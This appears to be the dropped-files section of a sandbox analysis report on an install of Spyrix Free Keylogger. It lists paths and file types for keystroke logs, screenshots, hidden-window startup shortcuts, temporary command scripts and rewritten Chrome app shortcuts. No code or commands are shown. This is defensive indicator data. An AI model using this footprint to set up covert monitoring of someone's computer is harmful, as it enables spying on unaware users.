Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\logo.png (copy)
|
PNG image data, 197 x 285, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\main.ico (copy)
|
MS Windows icon resource - 7 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel,
-128x-128, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\offer.url (copy)
|
MS Windows 95 Internet shortcut text (URL=<"http://www.spyrix.com/spyrix-products.php?from=sfk_install">), ASCII text, with
CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.cmd (copy)
|
ASCII text, with very long lines (382), with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sgw.m (copy)
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data,
big-endian, direntries=7, xresolution=98, yresolution=106, resolutionunit=2, software=paint.net 4.0.10], baseline, precision
8, 320x240, components 3
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Air.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Android.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Charm.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Default.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\HUD.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\SnowLeopard.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Ubuntu.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Win8.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\iOS4.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-1OS4I.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-2CIAP.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-63S21.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-86TIC.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-HI18P.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-HSVHP.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-J0QFK.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-J91JT.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-U4DSN.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe (copy)
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe (copy)
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spyrix.url (copy)
|
MS Windows 95 Internet shortcut text (URL=<"https://www.spyrix.com/purchase.php?from=sfk_uninstall">), ASCII text, with CRLF
line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy)
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\info.dat (copy)
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\info.net (copy)
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\info.ttl (copy)
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\is-ASQ85.tmp
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\is-DUO5D.tmp
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\is-LVQVH.tmp
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\info.dat (copy)
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\info.net (copy)
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\info.ttl (copy)
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\is-26FV7.tmp
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\is-7NMJI.tmp
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\is-JJ85I.tmp
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\tmain.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.dat
|
InnoSetup Log Spyrix Free Keylogger 11.6.22, version 0x418, 231571 bytes, 841618\37\user\37, C:\ProgramData\Security Monitor\{827D21CC-
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe
|
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\logs\45567.log
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\logs\45567.wdb
|
SQLite 3.x database, last written using SQLite version 3013000, file counter 11, database pages 4, cookie 0x2, schema 4, UTF-8,
version-valid-for 11
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\logs\45567.wdb-journal
|
SQLite Rollback Journal
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\logs\logs.dat
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\scr\45567.0082221528.jpg
|
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 891x487, components
3
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\scr\45567.0083447685.jpg
|
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 891x487, components
3
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\scr\scr.dat
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\desktop\Spyrix Free Keylogger.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0,
Archive, ctime=Wed Oct 2 03:11:15 2024, mtime=Wed Oct 2 03:11:25 2024, atime=Mon Sep 23 18:21:00 2024, length=5346216, window=hide
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\logger.ini
|
Generic INItialization configuration [System]
|
modified
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.dat (copy)
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.net (copy)
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.ttl (copy)
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\is-ONQ42.tmp
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\is-VFID4.tmp
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\is-VNNEC.tmp
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\info.dat (copy)
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\info.net (copy)
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\info.ttl (copy)
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\is-3MVAE.tmp
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\is-93JLK.tmp
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\is-CBJT8.tmp
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\runprg.ini
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\start\Spyrix Free Keylogger.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0,
Archive, ctime=Wed Oct 2 03:11:15 2024, mtime=Wed Oct 2 03:11:15 2024, atime=Mon Sep 23 18:21:00 2024, length=5346216, window=hide
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\start\Uninstall Spyrix Free Keylogger.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive,
ctime=Wed Oct 2 03:11:14 2024, mtime=Wed Oct 2 03:11:14 2024, atime=Wed Oct 2 03:10:31 2024, length=1308909, window=hide
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_Monitoring_StartButton_6E3F587357F4ED7D7098E81DD0F931D7
|
ASCII text, with very long lines (426), with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_Monitoring_Start_6E3F587357F4ED7D7098E81DD0F931D7
|
ASCII text, with very long lines (420), with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_Run_First_6E3F587357F4ED7D7098E81DD0F931D7
|
ASCII text, with very long lines (413), with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_wizard_Start_6E3F587357F4ED7D7098E81DD0F931D7
|
ASCII text, with very long lines (417), with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\stat\dlog\2024-10.wdb
|
SQLite 3.x database, last written using SQLite version 3013000, file counter 10, database pages 4, cookie 0x2, schema 4, UTF-8,
version-valid-for 10
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\stat\dlog\2024-10.wdb-journal
|
SQLite Rollback Journal
|
dropped
|
||
C:\ProgramData\{972DC8CA-126D-23FD-11AA-92876DD12AFD}\5913A2D6482586A397876746C6020FBE
|
HTML document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\38b5bf3b-2a32-4636-ac09-779581aade41.cmd
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\l
|
ASCII text, with no line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\stld2.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\stld3.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\REG214A.tmp
|
Windows Registry little-endian text (Win2K or above)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\REG8851.tmp
|
Windows Registry little-endian text (Win2K or above)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1idi3d0c.dxg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1n51sivl.hfg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32edlxif.4xa.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3jcee02h.amw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3r2di4fb.awu.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ba3ii2y2.mvf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cf0hrlcr.21h.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e4fgviju.50p.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eielro4i.flp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g0ugnfmy.dnf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjuz1lx3.p43.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlhu3o4o.5zr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iignm4me.gfw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ils5v2xc.eo2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iq3bahss.1ky.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j3imhnh3.vyf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_johbmj3w.wni.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrkiipny.30m.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l3e3c2nx.yob.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nkkbjr25.4rn.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_no01w45x.k5i.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogmbzsj5.b5s.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojpbobye.giz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pb4o1vx5.qig.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pc1tjfq4.bxg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phuip4ol.ige.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmwby1uc.sce.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0nbg3hf.evx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3twb1aj.45u.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tceif5bz.vio.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ua35ajff.0tn.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uvesquot.dlr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xllvaggj.tpq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xn5mol1c.ylp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xradeo5c.vwb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0sdding.qob.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y54oiyku.wkq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yv4wjwos.bjx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ywawfwia.2c3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zyyqjrmw.b2y.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\$ywr34c.tmp
|
ASCII text, with CRLF, CR line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\_isetup\_iscrypt.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\_isetup\_isdecmp.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\_isetup\_setup64.tmp
|
PE32+ executable (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\d.cmd
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\ex
|
Windows Registry little-endian text (Win2K or above)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\ex.cmd
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\iMsgInfo.bmp
|
PC bitmap, Windows 3.x format, 48 x 48 x 24, resolution 2835 x 2835 px/m, cbSize 6966, bits offset 54
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\psout
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\psout_p
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\pswd.cmd
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\sout
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\sout_p
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\spmmout
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\spmmout_p
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\spsout
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\spsout_p
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\webbrowser.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nse
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\sfkname.tmp
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\tpl556z6i5ctbzg
|
ASCII text, with very long lines (837), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 03:11:41 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 03:11:41 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 03:11:41 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 03:11:41 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 03:11:40 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
Chrome Cache Entry: 622
|
gzip compressed data, max speed, from Unix, original size modulo 2^32 27077
|
downloaded
|
||
Chrome Cache Entry: 623
|
Java source, ASCII text, with very long lines (1184)
|
downloaded
|
||
Chrome Cache Entry: 624
|
Java source, ASCII text, with very long lines (3701)
|
dropped
|
||
Chrome Cache Entry: 625
|
Java source, ASCII text, with very long lines (1184)
|
dropped
|
||
Chrome Cache Entry: 626
|
Java source, ASCII text, with very long lines (522)
|
downloaded
|
||
Chrome Cache Entry: 627
|
ASCII text
|
dropped
|
||
Chrome Cache Entry: 628
|
Java source, ASCII text, with very long lines (612)
|
dropped
|
||
Chrome Cache Entry: 629
|
ASCII text
|
downloaded
|
||
Chrome Cache Entry: 630
|
ASCII text, with very long lines (2465)
|
downloaded
|
||
Chrome Cache Entry: 631
|
ASCII text, with very long lines (773)
|
downloaded
|
||
Chrome Cache Entry: 632
|
PNG image data, 184 x 184, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
Chrome Cache Entry: 633
|
Java source, ASCII text, with very long lines (3701)
|
downloaded
|
||
Chrome Cache Entry: 634
|
ASCII text, with very long lines (628)
|
dropped
|
||
Chrome Cache Entry: 635
|
Java source, ASCII text, with very long lines (612)
|
downloaded
|
||
Chrome Cache Entry: 636
|
ASCII text, with very long lines (1097)
|
dropped
|
||
Chrome Cache Entry: 637
|
gzip compressed data, max speed, from Unix, original size modulo 2^32 1269714
|
dropped
|
||
Chrome Cache Entry: 638
|
ASCII text
|
downloaded
|
||
Chrome Cache Entry: 639
|
Java source, ASCII text, with very long lines (4588)
|
dropped
|
||
Chrome Cache Entry: 640
|
Java source, ASCII text, with very long lines (795)
|
dropped
|
||
Chrome Cache Entry: 641
|
Java source, ASCII text, with very long lines (4588)
|
downloaded
|
||
Chrome Cache Entry: 642
|
Java source, ASCII text, with very long lines (1391)
|
dropped
|
||
Chrome Cache Entry: 643
|
ASCII text, with very long lines (773)
|
dropped
|
||
Chrome Cache Entry: 644
|
Java source, Unicode text, UTF-8 text, with very long lines (731)
|
downloaded
|
||
Chrome Cache Entry: 645
|
gzip compressed data, max speed, from Unix, original size modulo 2^32 1269714
|
downloaded
|
||
Chrome Cache Entry: 646
|
ASCII text, with very long lines (1512)
|
downloaded
|
||
Chrome Cache Entry: 647
|
ASCII text
|
downloaded
|
||
Chrome Cache Entry: 648
|
ASCII text, with very long lines (3064)
|
downloaded
|
||
Chrome Cache Entry: 649
|
Java source, ASCII text, with very long lines (522)
|
dropped
|
||
Chrome Cache Entry: 650
|
ASCII text
|
downloaded
|
||
Chrome Cache Entry: 651
|
C++ source, Unicode text, UTF-8 text
|
downloaded
|
||
Chrome Cache Entry: 652
|
ASCII text, with very long lines (5945)
|
dropped
|
||
Chrome Cache Entry: 653
|
Java source, ASCII text, with very long lines (837)
|
dropped
|
||
Chrome Cache Entry: 654
|
gzip compressed data, max speed, from Unix, original size modulo 2^32 61324
|
downloaded
|
||
Chrome Cache Entry: 655
|
Java source, Unicode text, UTF-8 text, with very long lines (731)
|
dropped
|
||
Chrome Cache Entry: 656
|
ASCII text, with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 657
|
Web Open Font Format (Version 2), TrueType, length 44112, version 1.0
|
downloaded
|
||
Chrome Cache Entry: 658
|
Web Open Font Format (Version 2), TrueType, length 43608, version 1.0
|
downloaded
|
||
Chrome Cache Entry: 659
|
ASCII text
|
downloaded
|
||
Chrome Cache Entry: 660
|
gzip compressed data, max speed, from Unix, original size modulo 2^32 27077
|
dropped
|
||
Chrome Cache Entry: 661
|
ASCII text
|
dropped
|
||
Chrome Cache Entry: 662
|
ASCII text, with very long lines (628)
|
downloaded
|
||
